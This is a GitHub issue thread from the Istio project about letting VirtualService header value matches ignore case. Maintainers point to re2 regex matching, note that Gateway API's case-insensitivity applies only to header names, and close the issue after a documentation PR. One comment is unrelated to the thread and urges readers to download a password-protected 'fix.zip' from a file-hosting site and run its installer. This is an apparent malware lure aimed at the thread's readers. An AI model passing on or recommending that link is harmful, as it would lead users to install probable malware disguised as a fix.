### ISSUE TITLE
Option to ignore_case in route's header value matcher

### ISSUE THREAD

**Issue by huzlak** [istio/istio#52854]
**Describe the feature request**
I'd like to be able to ignore case of header value when I match based on it in virtualService.

**Describe alternatives you've considered**
Use an envoyfilter filter to convert case. 
There is an [envoy option](https://www.envoyproxy.io/docs/envoy/latest/api-v3/type/matcher/v3/string.proto#envoy-v3-api-msg-type-matcher-v3-stringmatcher:~:text=must%20be%20set.-,ignore_case,-(bool)%20If) to ignore case. Having this  exposed in virtualService [stringMatch](https://istio.io/latest/docs/reference/config/networking/virtual-service/#StringMatch) seems much better.
**Affected product area (please put an X in all that apply)**

[ ] Ambient
[ ] Docs
[ ] Dual Stack
[ ] Installation
[X] Networking
[ ] Performance and Scalability
[ ] Extensions and Telemetry
[ ] Security
[ ] Test and Release
[ ] User Experience
[ ] Developer Infrastructure

**Affected features (please put an X in all that apply)**

[ ] Multi Cluster
[ ] Virtual Machine
[ ] Multi Control Plane

**Additional context**

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hzxuzhonghu** [comment]
@huzlak can you take it otherwise someone else may be interested with this too

**Comment by linsun** [comment]
Hi @howardjohn @keithmattix @mikemorris do you know if this configuration is being considered for Gateway API/GAMMA?

cc @ilrudie 

Hi @huzlak adding ignore_case is possible, but we do want to align with the Gateway/GAMMA as that is the future of the networking API.

**Comment by linsun** [comment]
Chatted with @ilrudie offline a bit, and he kindly pointed out that we support [re2 style matching](https://github.com/google/re2/wiki/Syntax), which supports case-insensitive.  With that, I think this issue could be resolved as there is a way to do this in Istio. 

We could improve our [doc](https://istio.io/latest/docs/reference/config/networking/virtual-service/#StringMatch) to be a bit more clear to indicate we do support match case insensitive via re2.

**Comment by mikemorris** [comment]
For Gateway API/GAMMA, header matching is _required_ to be case-insensitive, see docs at https://gateway-api.sigs.k8s.io/reference/spec/#gateway.networking.k8s.io%2fv1.HTTPHeaderMatch

**Comment by howardjohn** [comment]
The GW API is about the _header name_, this is taking about the header value

**Comment by mikemorris** [comment]
> The GW API is about the header name, this is taking about the header value

Oh thanks for clarifying @howardjohn, I read too quickly - yea agreed a RegEx match is the right way to handle case-insensitive value matching then. There's been [a similar discussion about expanding the types of header matches](https://github.com/kubernetes-sigs/gateway-api/discussions/2576) but not much appetite for adding additional non-exact/RegEx configurations.

**Comment by ilrudie** [comment]
https://github.com/istio/api/pull/3304 was created to improve the doc

**Comment by linsun** [comment]
Thanks @ilrudie - i will close out this issue then.
